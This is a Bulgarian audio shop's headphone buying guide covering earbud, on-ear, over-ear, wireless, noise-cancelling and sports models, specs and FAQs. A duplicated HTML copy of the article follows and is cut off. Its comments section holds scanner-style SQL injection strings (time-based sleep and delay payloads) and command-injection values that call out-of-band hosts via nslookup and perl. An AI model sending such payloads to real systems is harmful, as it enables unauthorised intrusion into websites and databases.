Свържете се с нас
0882 666660 

Как да си изберем слушалки

09.01.2020 17:48:33

Как да си изберем слушалки

Не можете да изберете какъв тип слушалки да закупите? С тази статия, CNET предлагат ръководство за купуване, което ще ви помогне да стесните избора си.

Когато купуват слушалки в наши дни, хората обикновено обсъждат стила на слушалките, които искат - в ухото (in-ear), върху ухото (on-ear), около ухото (over-ear); дали да изберат кабелни или безжични (или дори напълно безжични) и дали да изберат допълнителни функции като активно шумопотискане, за заглушаване на околния шум. О, и също така цената - всеки има бюджет.

Но ако все още сте малко изгубени в лабиринта за слушалки - ето малко информация, която, надяваме се, ще ви помогне в правилната посока.  В този списък излагаме всички варианти, за да можете да изберете най-добрите слушалки за вас. Представени в различни категории, включително безжични, спортни, шумозаглушаващи и бюджетни.

Форми и стилове

През последните години разликите между преносимите и слушалките за домашно слушане почти се стопиха, но следните типове слушалки ще изяснят вашите опции за покупка. Как възнамерявате да използвате слушалките си (за музика, домашно кино или игри) и къде планирате да слушате (у дома или в движение). Постепенно ще стесняваме кръга от възможни видове слушалки, които бихте искали да изпробвате.

1. Слушалки тип "тапи"
/Наричани още "in-ear"/


Снимка: Fiio / Модел: Fiio F5

Слушалките в стил "тапи" варират от моделите за еднократна употреба, които получавате в самолета или тези, които идват с вашия смартфон, до висококачествени такива, които предлагат звуци, съперничащи на модели в стил "on-ear" и "over-ear". Техните миниатюрни говорители се разполагат на външното ухо или трябва да бъдат поставени в ушния канал. А някои модели, особено спортните "тапи", включват "крила" или "перки" за по-подходящо, сигурно прилягане.


Снимка: Fiio / Модел: Fiio FH5

Плюсове: Ултра компактни и леки; повечето модели имат микрофон и контроли за навигация на песните, вградени в кабела; могат да осигурят умерена до отлична изолация от външни шумове; малка, почти никаква пречка с обеци, очила, шапки, прически или други аксесоари.

Минуси: Качеството на звука и честотната характеристика често не са сравними с пълноразмерните модели; понякога могат да причинят дискомфорт при продължителна употреба; някои референтни модели са трудни за поставяне и изваждане, което ги прави по-малко от идеални за офис среда; Дизайнът с двоен кабел означава повече възможности за заплитане.

Допълнителни функции: Дистанционно за управление на силата на звука; разнообразие от размери и материали за накрайника на слушалката (пяна, гума, силикон); рамки за над ухо; множество балансирани арматурни драйвери с кросоувър.

 

2. Слушалки тип "върху ухото"
/Наричани още "on-ear"; Могат да бъдат с отворен, полуотворен или затворен тип на звучене/

Снимка: Beats by Dre/ Модел: Beats Solo 3

Както се подразбира, тези слушалки се разполагат върху ушите и варират от бюджетни и преносими до модели от висок клас за слушане у дома. Докато "on-ear" слушалките могат да имат и затворен дизайн, който покрива ушите, някои предпочитат напълно затворени модели (вижте по-долу) заради повишената им звукоизолация и факта, че няма да пропускат звук към оконите. Все пак слушалките са предпочитани за места като в офиса, където слушателя трябва да чува и заобикалящата го среда.

Плюсове: Сравнително компактни; по-малко запаряване на ушите, в сравнение с пълноразмерните слушалки; някои модели се сгъват за лесно транспортиране.

Минуси:
По-малко ефективнo шумоизолиране от "in-ear" или "over-ear" моделите; по-слаб бас в сравнение със слушалки в стил "over-ear"; пропускат звук към оконите.

Допълнителни функции: Бутони за управление и навигация, с микрофон вграден в кабела; опция за допълнителен комплект наишници; калъф (пауч) за транспортиране; сгъваем дизайн; навит и прав кабел.

 

3. Слушалки тип "около ухото"
/Наричани още пълноразмерни или "over-ear" слушалки; Могат да бъдат с отворен, полуотворен или затворен тип на звучене/

Снимка: Shure/ Модел: Shure SRH840

Технологичното описание за този тип слушалки е "circumaural" (от Латински: circum - “around” +‎ aural (“ear”)), което включва всякакви слушалки с наушници, които напълно обгръщат ушите ви. Поради размерите и акустичната им изолация, слушалките в от този тип често се считат за по-подходящи за домашна употреба, а не като преносима опция, но скоро придобитата популярност на пълноразмерните, шумозаглушаващи слушалки са предизвикателство за това правило.

Плюсове: Големите слушалки предлагат потенциал за максимални нива на бас и сила на звука; слушалките от този тип създават по-широка звукова сцена; съраунд звукът ефективно блокира външните шумове, запечатва музика около ухото.

Минуси:
Големият размер слушалките може да бъде тромав за употреба в движение; някои модели слушалки от този вид могат да запарват ушите при продължителна употреба; широката лента за глава често може да пречи на обеци, очила и някои прически. 

Допълнителни функции: Сгъваем дизайн; опции за разкачащ, сменяем кабел; микрофон с навигацията на песните и силата на звука от кабела; сменяеми наушници.

 

4. Безжични слушалки
/Наричани още Bluetooth слушалки/

Снимка: Audio-Technica/ Модел: Audio-Technica ATH-M50XBT

Най-популярният начин за предаване на безжична музика е Bluetooth, но имайте предвид, че ще пожертвате някакво качество на звука поради процеса на компресиране на файла. За да се преборят с тази компресия на звука, някои модели поддържат кодека aptX Bluetooth, който предлага леко подобрено звучене.

Налични са и слушалки за домашно кино, които използват радиочестотна връзка. А вече и Wi-Fi слушалки излизат на пазара.

Плюсове: Няма кабел между слушалките и аудио устройство. Можете да предавате аудио на разстояние до 10м от устройството си - а понякога и по-далеч.

Минуси:
Музиката спира, когато батерията ви "умре"; компресираните аудио файлове могат да направят музиката ви да звучи по-малко динамично.

Допълнителни функции: Активно премахване на шума (Active noise-cancellation); 3,5 мм порт и кабел за кабелна връзка; сменяеми наушници; калъф (пауч) за транспортиране.

 

5. Изцяло безжични слушалки
/Наричани още "True-wireless" слушалки/

Снимка: HIFIMAN/ Модел: HIFIMAN TWS600

Все повече нараства броя на безжичните слушалки, които пристигат на пазара. Някои, като AirPods на Apple и Skybuds на Alpha Audio, се опитват да опростят нещата и имат сравнително ограничен набор от функции. Въпреки това, моделите от по-висок клас като HIFIMAN TWS600 предлагат и бутони за по-лесна навигация, върху самата слушалка.

Плюсове: Няма абсоютно никакви кабели.

Минуси:
Животът на батерията може да бъде сравнително кратък; трябва да бъдете изключително внимателни, за да не загубите едната или и двете тапи; добрите модели с надеждно изпълнение са по-скъпи от стандартните безжични слушалки.

Допълнителни функции: Калъф за зареждане; удобна навигация, разположена върху самата слушалка; усъвършенствано шумово филтриране.

 

 

6. Шумопотискащи слушалки
/Наричани още "Noise-canceling" слушалки/

Снимка: Sennheiser/ Модел: Sennheiser HD 4.50BTNC

Тези слушалки заглушават околния шум, създавайки анти-шум, който премахва шума към ухото ви. Те не елиминират външния свят, но по-добрите модели значително намаляват шумотевицата от заобикалящата среда. Слушалките с шумопотискане се предлагат във всякакви форми - от пълноразмерни до тапи. Тъй като с тях не е необходимо да увеличавате силата на звука, за да преодолеете фоновия шум, този тип слушалки ви позволява да слушате на по-ниски нива, което води до щадене на слуха и по-малко умора на ухото. Ще чуете и повече от нискочестотните детайли във вашата музика.

Плюсове: Няма абсоютно никакви кабели.

Минуси:
Променя „естествените“ качества на музиката; някои хора изпитват гадене от „подводния“ ефект който се създава при процеса на шумоизолиране.

Допълнителни функции: Безжична връзка; калъф за транспортиране; презареждащи се батерии; навигация и контрол на силата на звука.

 

7. Lightning или USB-C кабелни слушалки

Снимка: Razer/ Модел: Razer HAMMERHEAD FOR IOS MERCURY

С Lightning или USB-C накрайник свързвате слушалките директно в Lightning порта (на устройства на Apple) или USB-C порта (на устройства с Android). Стандартният накрайник за слушалки предава аналогова връзка, докато с тези се създава директна цифрова връзка. Слушалките се захранват от вашия телефон (те използват само малко енергия от батерията) и имат интегриран ЦАП (цифрово-аналогов преобразувател,) или казано иначе DAC, който обикновено превъзхожда DAC-а във вашия телефон.

Не са много моделите слушалки от този тип, но все пак се предлагат в различни стилове (in-ear, on-ear, over-ear).

Плюсове: Директната цифрова връзка за по-чисто звучене.

Минуси:
Нуждаете се от конвертор, с който да ги включите в стандартен аналогов аудио жак; използва малко от батерията на вашия телефон; могат да бъдат по-скъпи от стандартните кабелни слушалки.

Допълнителни функции: Вградено активно шумопотискане, захранвано от вашия телефон.

 

8. Слушалки за спорт

Снимка: JBL By Harman/ Модел: JBL REFLECT MINI BT

Спортните слушалки са сред най-популярните видове слушалки, а най-добрите вече са безжични. Устойчиви на пот или дори напълно водоустойчиви, те могат да се използват във фитнеса или за бягане или колоездене. Някои от тях имат отворен или полуотворен дизайн, за да пропуснат външен звук от съображения за безопасност. Други модели обаче имат затворен, шумоизолиращ дизайн.

Повечето даже се справят добре и като ежедневни слушалки.

Плюсове: Проектирани да се използват по време на активни занимания; устойчиви на пот или дори водоустойчиви.

Минуси:
Някои модели имат отворен дизайн и не са добри за по-шумни среди.

Допълнителни функции: Някои модели имат сензор за сърдечен ритъм; калъф за транспортиране

 

Форми и стилове

Размерът, видът и технологията на чифт слушалки са от решаващо значение при избора за покупка. Но е важно първо да разясним множеството от функции и специфики при слушалките. Изброените по-долу функции са най-важните, които трябва да вземете предвид, преди да изберете перфектните за вас слушалки.

 • Бас: Дори и в най-добрия случай, басът на слушалките никога не е онзи тип който ви кара да "изкочите от чорапите", който буквално усещате от масивни високоговорители или субуфери. Въпреки това много производители обичат да настройват своя "отличаващ звук", за да подчертаят по-ниските честоти, макар и с цената на естественото възпроизвеждане на звука.
  Слушалките тип "тапи" са малки и преносими, но - с изключение на няколко модела от по-високите класове - те не могат да се съревновават с пълноразмерните (over-ear) слушалки за дълбока басова характеристика или динамичен диапазон.
 • Затворени срещу отворени: Затворените слушалки - шумоизолиращите модели, с дизайн във или върху/около ухото - акустично изолират ушите ви от външната среда. Разбира се, степента на изолация варира от един чифт слушалки до друг. Също така уплътнението ограничава изтичането на звука от слушалките към помещението.
  Затворените модели са идеални за лично слушане, където не искате звукът да бъде чут от други хора. Отворените слушалки - като модели с наушници от дунапрен и много от тези със спортен дизайн - са акустично прозрачни и позволяват външния звук да бъде чут от слушателя на слушалките, а голяма част от звука от слушалките ще бъде чут на всеки в близост до слушателя.

  Най-общо казано, такива слушалки произвеждат по-добър, "отворен" звук от затворените дизайни. Тъй като те не блокират всичко от заобикалящата среда. Слушалки с отворени гръб се препоръчват за дейности на открито, като джогинг, които изискват осведоменост за средата, в коят се намирате.

 • Комфорт и тегло: Оценяването на качеството на звука винаги е субективно изживяване, но единственият начин да прецените комфорта е да ги включите и да слушате поне 10 минути.
  Дали слушалките не оказват прекалено голям натиск върху ушите ви? Слушалките, които обграждат или покриват ушите ви, могат неприятно да запаравят, но ще трябва да ги поносите известно време, за да разберете. Някои от по-големите затворени модели с леки наушници от кожа са едни от главните виновници за това.

  Слушалките в стил "Pro" са сравнително обемни и могат да се окажат неприятно тежки след часове употреба. По-леките слушалки със стилна лентата за глава са почти винаги по-удобни. И дори да не са, поне са по-малка разправия при трнаспортиране.

 • Трайност: Няма причина слушалките да се третират като технология за еднократна употреба. За разлика от почти всичко останало в сферата на потребителската електроника, тазгодишните слушалки няма да са остарели шест месеца или една година от сега. Всъщност няма причина един добър чифт слушалки да не издържат почти десетилетие.

  Не забравяйте да оцените качеството на сглобките на бъдещите си слушалки. Например, някои наушници и преносими устройства са сравнително крехки. Ако слушалките се сгъват за по-лесно съхранение, пантите дали са здрави или ще се разпаднат след месец или два? Не забравяйте да вземете предвид, че наушниците, разбираемо, може значително да се износят през годините слушане.

 • Обвивка на кабела и дължина: Повечето стерео слушалки имат само един кабел, обикновено прикрепен към лявата слушалка (понякога наричана едностранно окабеляване). Някои модели - и всички в стил "тапи" - използват Y-кабел, който се свързва с двете слушалки (двустранно). Междувременно, накрайника на кабела обикновено е един от двата дизайна: прав I-накрайник или ъглов (извит) L-накрайник; последният може да бъде полезен, ако преносимият ви плейър има монтиран страничен или долен жак за слушалки.

Предпочитанията за дължината на кабела на слушалките варират, особено в зависимост от това къде предпочитате да носите аудио устройството си: за в раницата или джоба на панталоните е необходим по-дълъг кабел. По-къс кабел е необходим, ако носите плейъра си закачен на яката или закрепен с лента за ръката. Но дължината на кабела в която и да е крайност не трябва да е фатален недостатък: предлагат се удължения за кабели, които могат да добавят необходимата дължина към вашия кабел; както и допълнителни кабелни обвивки, които могат да скъсят тези, които са твърде дълги.

 

Кратък справочнк

Ще намерите някои от следните спецификации върху кутията на слушалките или на уеб сайта на производителя. Ето какво означават те:

Честотна характеристика (Frequency response): Спецификациите за честотна характеристика във големите високоговорителите като цяло са доста безполезни при прогнозиране на качеството на звука, но цифрите на честотната характеристика при слушалките е още по-зле. Производителите рутинно преувеличават тези цифри до такава степен, че те не са от значение. Дори и най-обикновените, евтини слушалки се гордеят с изключително ниска производителност - 15Hz или 20Hz, но почти винаги звучат повърхностно и не както очакваме. 

Общо хармонично изкривяване: Вярно е, че слушалките с по-ниско общо хармонично изкривяване (От Латински: Total Harmonic Distortion, THD) ще звучат по-добре от тези с по-високо THD. Но цитираните THD числа - "по-малко от 1%" - не са полезни за прогнозиране на качеството на звука. Слушайте записи на просто записана акустична китара, за да прецените изкривяването на един чифт слушалки спрямо друг. Някои ще звучат значително по-чисто от други.

Импеданс: Най-общо казано, колкото по-нисък е електрическият импеданс на слушалките (известен още като съпротивление), толкова по-лесно е да получите по-голям обем на звука. Но тук отново ниският импеданс не е гаранция за висока обемна способност; други фактори все още могат да ограничат потенциала на силата на звука. Тъй като много MP3 плейъри имат слаба мощност - iPod е забележително изключение - интелигентните купувачи трябва да проверят силата на звука, преди да закупят чифт слушалки. За да сте сигурни, тествайте намясто с плейъра си.

 

Често задавани въпроси

Имам ли нужда от усилвател за слушалки?

Това, в което включвате слушалките, може значително да повлияе на звука им, а качеството на вградените усилватели в преносимите CD/MP3 плейъри, като цяло е ужасно. Това не е тяхна вина: тези компактни машинки трябва да захранват електрониката и вътрешния си усилвател, използвайки само няколко волта. Дори някои жакове за слушалки в по-добрите домашни AV приемници предлагат много променливо качество на звука.


Снимка: Astell & Kern/ Модел: Astell & Kern ACRO L1000

Ако през повечето време слушате от слушалки и се грижите за качеството на звука, бихте могли да помислите за закупуване на усилвател за слушалки. Предлагат се както домашни, така и преносими усилватели за слушалки.

Загубих тапичките, с които дойдоха моите слушалки - трябва ли да си купя изцяло нов чифт слушалки?

Абсолютно не ... освен ако не търсите извинение да опитате нещо ново. Но ако не сте направени от пари, винаги можете да се обърнете към производителя за нов чифт тапички за подмяна. Повечето наушници се предлагат само с един набор от всеки размер, така че загубата на една може да бъде неприятно. Ако сте в експериментално настроение, може дори да пробвате да ги смените с такива от различен материал.

Значи ли по-високата цена, че слушалките ще звучат по-добре?

Не е задължително. Непрекъснато се изненадваме, че хората раздават стотици левове за смартфон и все още отказват да инвестират в качествени слушалки, за да ги използват с него. От друга страна, не всички бюджетни слушалки трябва да се приемат за евтини.

 

Готови ли сте за пазаруване? Преминете към нашия електронен магазин за аудио техника, за да започнете.

Или заповядайте на нашия щанд, за да приложите каквото научихте и да тествате на място!

 

 

 

 

Коментари

22.01.2021 555
22.01.2021 555
22.01.2021 555
22.01.2021 555
22.01.2021 555
22.01.2021 555
22.01.2021 555
22.01.2021 555
22.01.2021 555
22.01.2021 555
22.01.2021 555
22.01.2021 555
22.01.2021 555
22.01.2021 555
22.01.2021 555
22.01.2021 555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
22.01.2021 555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
22.01.2021 I9tK5mHV') OR 735=(SELECT 735 FROM PG_SLEEP(15))--
22.01.2021 b4XnnBRy' OR 564=(SELECT 564 FROM PG_SLEEP(15))--
22.01.2021 -1)) OR 295=(SELECT 295 FROM PG_SLEEP(15))--
22.01.2021 -5) OR 512=(SELECT 512 FROM PG_SLEEP(15))--
22.01.2021 -5 OR 581=(SELECT 581 FROM PG_SLEEP(15))--
22.01.2021 1 waitfor delay '0:0:15' --
22.01.2021 -1); waitfor delay '0:0:15' --
22.01.2021 -1; waitfor delay '0:0:15' --
22.01.2021 (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
22.01.2021 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
22.01.2021 555
22.01.2021 B9T4kpcD
22.01.2021 &(nslookup hiteyzlhvcejw7e1ab.bxss.me||perl -e "gethostbyname('hiteyzlhvcejw7e1ab.bxss.me')")&'\"`0&(nslookup hiteyzlhvcejw7e1ab.bxss.me||perl -e "gethostbyname('hiteyzlhvcejw7e1ab.bxss.me')")&`'
22.01.2021 555
22.01.2021 $(nslookup hitlhgywfuxybd83c6.bxss.me||perl -e "gethostbyname('hitlhgywfuxybd83c6.bxss.me')")

Остави коментар

Статии

Актуално

Как да си изберем слушалки

Как да си изберем слушалки

Не можете да изберете какъв тип слушалки да закупите? С тази статия, CNET предлагат ръководство за купуване, което ще ви помогне да стесните избора си.Кога Не можете да изберете какъв тип слушалки да закупите? С тази статия, CNET предлагат ръководство за купуване, което ще ви помогне да стесните избора си.Кога 2020-01-23T13:27:29+02:00 Как да си изберем слушалки

<p><span style="font-size: 12pt;"><strong>Не можете да изберете какъв тип слушалки да закупите? С тази статия,&nbsp;<a href="https://www.cnet.com/">CNET</a> предлагат ръководство за купуване, което ще ви помогне да стесните избора си.</strong></span><br /><br />Когато купуват слушалки в наши дни, хората обикновено обсъждат стила на слушалките, които искат - в ухото (in-ear), върху ухото (on-ear), около ухото (over-ear); дали да изберат кабелни или безжични (или дори напълно безжични) и дали да изберат допълнителни функции като активно шумопотискане, за заглушаване на околния шум. О, и също така цената - всеки има бюджет.</p> <p>Но ако все още сте малко изгубени в лабиринта за слушалки - ето малко информация, която, надяваме се, ще ви помогне в правилната посока.&nbsp; В този списък излагаме всички варианти, за да можете да изберете най-добрите слушалки за вас. Представени в различни категории, включително безжични, спортни, шумозаглушаващи и бюджетни.</p> <p><span style="text-decoration: underline; font-size: 12pt;"><strong>Форми и стилове<br /><br /></strong></span></p> <p>През последните години разликите между преносимите и слушалките за домашно слушане почти се стопиха, но следните типове слушалки ще изяснят вашите опции за покупка. Как възнамерявате да използвате слушалките си (за музика, домашно кино или игри) и къде планирате да слушате (у дома или в движение). Постепенно ще стесняваме кръга от възможни видове слушалки, които бихте искали да изпробвате.</p> <p><strong>1. Слушалки тип "тапи"<br /></strong>/Наричани още "in-ear"/</p> <p><img src="https://cdncloudcart.com/14803/files/image/dfgdhfjfyj.png" alt="" /><br /><span style="font-size: 8pt;">Снимка: Fiio / Модел: <a href="https://kirov-high-end.bg/product/products-436">Fiio F5</a></span></p> <p>Слушалките в стил "тапи" варират от моделите за еднократна употреба, които получавате в самолета или тези, които идват с вашия смартфон, до висококачествени такива, които предлагат звуци, съперничащи на модели в стил "on-ear" и "over-ear". Техните миниатюрни говорители се разполагат на външното ухо или трябва да бъдат поставени в ушния канал. А някои модели, особено спортните "тапи", включват "крила" или "перки" за по-подходящо, сигурно прилягане.</p> <p><img src="https://cdncloudcart.com/14803/files/image/fiio-fh5-quad-driver-in-ear-headphones.jpg" alt="" /><br /><span style="font-size: 8pt;">Снимка: Fiio / Модел: <a href="https://kirov-high-end.bg/product/products-348">Fiio&nbsp;FH5<br /></a></span></p> <p><strong>Плюсове:</strong>&nbsp;Ултра компактни и леки; повечето модели имат микрофон и контроли за навигация на песните, вградени в кабела; могат да осигурят умерена до отлична изолация от външни шумове; малка, почти никаква пречка с обеци, очила, шапки, прически или други аксесоари.</p> <p><strong>Минуси:</strong> Качеството на звука и честотната характеристика често не са сравними с пълноразмерните модели; понякога могат да причинят дискомфорт при продължителна употреба; някои референтни модели са трудни за поставяне и изваждане, което ги прави по-малко от идеални за офис среда; Дизайнът с двоен кабел означава повече възможности за заплитане.</p> <p><strong>Допълнителни функции:</strong> Дистанционно за управление на силата на звука; разнообразие от размери и материали за накрайника на слушалката (пяна, гума, силикон); рамки за над ухо; множество балансирани арматурни драйвери с кросоувър.</p> <p>&nbsp;</p> <p><strong>2. Слушалки тип "върху ухото"<br /></strong>/Наричани още "on-ear"; Могат да бъдат с отворен, полуотворен или затворен тип на звучене/</p> <p><img src="https://cdncloudcart.com/14803/files/image/beats-solo-3-wireless-headphones-featured.jpg" alt="" /><span style="font-size: 8pt;">Снимка: Beats by Dre/ Модел: <a href="https://kirov-high-end.bg/product/products-121">Beats Solo 3</a></span></p> <p>Както се подразбира, тези слушалки се разполагат върху ушите и варират от бюджетни и преносими до модели от висок клас за слушане у дома. Докато "on-ear" слушалките могат да имат и затворен дизайн, който покрива ушите, някои предпочитат напълно затворени модели (вижте по-долу) заради повишената им звукоизолация и факта, че няма да пропускат звук към оконите. Все пак слушалките са предпочитани за места като в офиса, където слушателя трябва да чува и заобикалящата го среда.</p> <p><strong>Плюсове:&nbsp;</strong>Сравнително компактни; по-малко запаряване на ушите, в сравнение с пълноразмерните слушалки; някои модели се сгъват за лесно транспортиране.<strong><br /></strong><strong><br />Минуси:</strong> По-малко ефективнo шумоизолиране от "in-ear" или "over-ear" моделите; по-слаб бас в сравнение със слушалки в стил "over-ear"; пропускат звук към оконите.</p> <p><strong>Допълнителни функции:</strong>&nbsp;Бутони за управление и навигация, с микрофон вграден в кабела; опция за допълнителен комплект наишници; калъф (пауч) за транспортиране; сгъваем дизайн; навит и прав кабел.</p> <p>&nbsp;</p> <p><strong>3.&nbsp;Слушалки тип "около ухото"<br /></strong>/Наричани още пълноразмерни&nbsp;или "over-ear" слушалки; Могат да бъдат с отворен, полуотворен или затворен тип на звучене/</p> <p><span style="font-size: 8pt;"><img src="https://cdncloudcart.com/14803/files/image/-5e171538009ea.png" alt="" />Снимка: Shure/ Модел: <a href="https://kirov-high-end.bg/product/products-871">Shure SRH840</a></span></p> <p>Технологичното описание за този тип слушалки е "circumaural" (от Латински:&nbsp;circum - &ldquo;around&rdquo; +&lrm; aural (&ldquo;ear&rdquo;)), което включва всякакви слушалки с наушници, които напълно обгръщат ушите ви. Поради размерите и акустичната им изолация, слушалките в от този тип често се считат за по-подходящи за домашна употреба, а не като преносима опция, но скоро придобитата популярност на пълноразмерните, шумозаглушаващи слушалки са предизвикателство за това правило.</p> <p><strong>Плюсове: </strong>Големите слушалки предлагат потенциал за максимални нива на бас и сила на звука; слушалките от този тип създават по-широка звукова сцена; съраунд звукът ефективно блокира външните шумове, запечатва музика около ухото.<strong><br /></strong><strong><br />Минуси:</strong> Големият размер слушалките може да бъде тромав за употреба в движение; някои модели слушалки от този вид могат да запарват ушите при продължителна употреба; широката лента за глава често може да пречи на обеци, очила и някои прически.&nbsp;</p> <p><strong>Допълнителни функции:</strong> Сгъваем дизайн; опции за разкачащ, сменяем кабел; микрофон с&nbsp;навигацията на песните и силата на звука от кабела; сменяеми наушници.</p> <p>&nbsp;</p> <p><strong>4.&nbsp;Безжични слушалки<br /></strong>/Наричани още Bluetooth слушалки/</p> <p><img src="https://cdncloudcart.com/14803/files/image/ath-m50xbt-1204x642.jpg" alt="" /><span style="font-size: 8pt;">Снимка: Audio-Technica/ Модел: <a href="https://kirov-high-end.bg/product/products-732">Audio-Technica ATH-M50XBT</a></span></p> <p>Най-популярният начин за предаване на безжична музика е Bluetooth, но имайте предвид, че ще пожертвате някакво качество на звука поради процеса на компресиране на файла. За да се преборят с тази компресия на звука, някои модели поддържат кодека aptX Bluetooth, който предлага леко подобрено звучене.</p> <p>Налични са и слушалки за домашно кино, които използват радиочестотна връзка. А вече и Wi-Fi слушалки излизат на пазара.</p> <p><strong>Плюсове: </strong>Няма кабел между слушалките и аудио устройство. Можете да предавате аудио на разстояние до 10м от устройството си - а понякога и по-далеч.<strong><br /></strong><strong><br />Минуси:</strong> Музиката спира, когато батерията ви "умре"; компресираните аудио файлове могат да направят музиката ви да звучи по-малко динамично.<strong><br /></strong></p> <p><strong>Допълнителни функции:</strong> Активно премахване на шума (Active noise-cancellation); 3,5 мм порт и кабел за кабелна връзка; сменяеми наушници; калъф (пауч) за транспортиране.</p> <p>&nbsp;</p> <p><strong>5. Изцяло безжични слушалки<br /></strong>/Наричани още "True-wireless" слушалки/</p> <p><img src="https://cdncloudcart.com/14803/files/image/-5e171997a4b29.png" alt="" /><span style="font-size: 8pt;">Снимка: HIFIMAN/ Модел: <a href="https://kirov-high-end.bg/product/products-818">HIFIMAN TWS600</a></span></p> <p>Все повече нараства броя на безжичните слушалки, които пристигат на пазара. Някои, като AirPods на Apple и Skybuds на Alpha Audio, се опитват да опростят нещата и имат сравнително ограничен набор от функции. Въпреки това, моделите от по-висок клас като HIFIMAN TWS600 предлагат и бутони за по-лесна навигация, върху самата слушалка.</p> <p><strong>Плюсове: </strong>Няма абсоютно никакви кабели.<strong><br /></strong><strong><br />Минуси:</strong> Животът на батерията може да бъде сравнително кратък; трябва да бъдете изключително внимателни, за да не загубите едната или и двете тапи; добрите модели с надеждно изпълнение са по-скъпи от стандартните безжични слушалки.<strong><br /></strong></p> <p><strong>Допълнителни функции:</strong> Калъф за зареждане; удобна навигация, разположена върху самата слушалка; усъвършенствано шумово филтриране.</p> <p>&nbsp;</p> <p>&nbsp;</p> <p><strong>6. Шумопотискащи слушалки<br /></strong>/Наричани още "Noise-canceling" слушалки/</p> <p><img src="https://cdncloudcart.com/14803/files/image/c223f0da9bbeab06842f430f42187a92.jpg" alt="" /><span style="font-size: 8pt;">Снимка: Sennheiser/ Модел: <a href="https://kirov-high-end.bg/product/products-821">Sennheiser HD 4.50BTNC</a></span></p> <p>Тези слушалки заглушават околния шум, създавайки анти-шум, който премахва шума към ухото ви. Те не елиминират външния свят, но по-добрите модели значително намаляват шумотевицата от заобикалящата среда. Слушалките с шумопотискане се предлагат във всякакви форми - от пълноразмерни до тапи. Тъй като с тях не е необходимо да увеличавате силата на звука, за да преодолеете фоновия шум, този тип слушалки ви позволява да слушате на по-ниски нива, което води до щадене на слуха и по-малко умора на ухото. Ще чуете и повече от нискочестотните детайли във вашата музика.</p> <p><strong>Плюсове: </strong>Няма абсоютно никакви кабели.<strong><br /></strong><strong><br />Минуси:</strong> Променя &bdquo;естествените&ldquo; качества на музиката; някои хора изпитват гадене от &bdquo;подводния&ldquo; ефект който се създава при процеса на шумоизолиране.<strong><br /></strong></p> <p><strong>Допълнителни функции:</strong> Безжична връзка; калъф за транспортиране; презареждащи се батерии; навигация и контрол на силата на звука.</p> <p>&nbsp;</p> <p><strong>7. Lightning или USB-C кабелни слушалки</strong></p> <p><img src="https://cdncloudcart.com/14803/files/image/rtgrtgrthfher.png" alt="" /><span style="font-size: 8pt;">Снимка: Razer/ Модел: <a href="https://kirov-high-end.bg/product/products-791">Razer HAMMERHEAD FOR IOS MERCURY</a></span></p> <p>С Lightning или USB-C накрайник свързвате слушалките директно в Lightning порта (на устройства на Apple) или USB-C порта (на устройства с Android). Стандартният накрайник за слушалки предава аналогова връзка, докато с тези се създава директна цифрова връзка. Слушалките се захранват от вашия телефон (те използват само малко енергия от батерията) и имат интегриран ЦАП (цифрово-аналогов преобразувател,) или казано иначе DAC, който обикновено превъзхожда DAC-а във вашия телефон.</p> <p>Не са много моделите слушалки от този тип, но все пак се предлагат в различни стилове (in-ear, on-ear, over-ear).</p> <p><strong>Плюсове:&nbsp;</strong>Директната цифрова връзка за по-чисто звучене.<strong><br /></strong><strong><br />Минуси:</strong> Нуждаете се от конвертор, с който да ги включите в стандартен аналогов аудио жак; използва малко от батерията на вашия телефон; могат да бъдат по-скъпи от стандартните кабелни слушалки.<strong><br /></strong></p> <p><strong>Допълнителни функции:</strong> Вградено активно шумопотискане, захранвано от вашия телефон.</p> <p>&nbsp;</p> <p><strong>8. Слушалки за спорт</strong></p> <p><img src="https://cdncloudcart.com/14803/files/image/ath-m50xbt-1204x642.png" alt="" /><span style="font-size: 8pt;">Снимка: JBL By Harman/ Модел: <a href="https://kirov-high-end.bg/product/products-625">JBL REFLECT MINI BT</a></span></p> <p>Спортните слушалки са сред най-популярните видове слушалки, а най-добрите вече са безжични. Устойчиви на пот или дори напълно водоустойчиви, те могат да се използват във фитнеса или за бягане или колоездене. Някои от тях имат отворен или полуотворен дизайн, за да пропуснат външен звук от съображения за безопасност. Други модели обаче имат затворен, шумоизолиращ дизайн.</p> <p>Повечето даже се справят добре и като ежедневни слушалки.</p> <p><strong>Плюсове: </strong>Проектирани да се използват по време на активни занимания; устойчиви на пот или дори водоустойчиви.<strong><br /></strong><strong><br />Минуси:</strong> Някои модели имат отворен дизайн и не са добри за по-шумни среди.<strong><br /></strong></p> <p><strong>Допълнителни функции:</strong>&nbsp;Някои модели имат сензор за сърдечен ритъм; калъф за транспортиране</p> <p>&nbsp;</p> <p><span style="text-decoration: underline; font-size: 12pt;"><strong>Форми и стилове<br /></strong></span></p> <p>Размерът, видът и технологията на чифт слушалки са от решаващо значение при избора за покупка. Но е важно първо да разясним множеството от функции и специфики при слушалките. Изброените по-долу функции са най-важните, които трябва да вземете предвид, преди да изберете перфектните за вас слушалки.</p> <ul> <li><strong>Бас:</strong> Дори и в най-добрия случай, басът на слушалките никога не е онзи тип който ви кара да "изкочите от чорапите", който буквално усещате от масивни високоговорители или субуфери. Въпреки това много производители обичат да настройват своя "отличаващ звук", за да подчертаят по-ниските честоти, макар и с цената на естественото възпроизвеждане на звука.<br />Слушалките тип "тапи" са малки и преносими, но - с изключение на няколко модела от по-високите класове - те не могат да се съревновават с пълноразмерните (over-ear) слушалки за дълбока басова характеристика или динамичен диапазон.<strong><br /></strong></li> <li><strong>Затворени срещу отворени:</strong>&nbsp;Затворените слушалки - шумоизолиращите модели, с дизайн във или върху/около ухото - акустично изолират ушите ви от външната среда. Разбира се, степента на изолация варира от един чифт слушалки до друг. Също така уплътнението ограничава изтичането на звука от слушалките към помещението.<br />Затворените модели са идеални за лично слушане, където не искате звукът да бъде чут от други хора. Отворените слушалки - като модели с наушници от дунапрен и много от тези със спортен дизайн - са акустично прозрачни и позволяват външния звук да бъде чут от слушателя на слушалките, а голяма част от звука от слушалките ще бъде чут на всеки в близост до слушателя.<br /><br />Най-общо казано, такива слушалки произвеждат по-добър, "отворен" звук от затворените дизайни. Тъй като те не блокират всичко от заобикалящата среда. Слушалки с отворени гръб се препоръчват за дейности на открито, като джогинг, които изискват осведоменост за средата, в коят се намирате.<br /><br 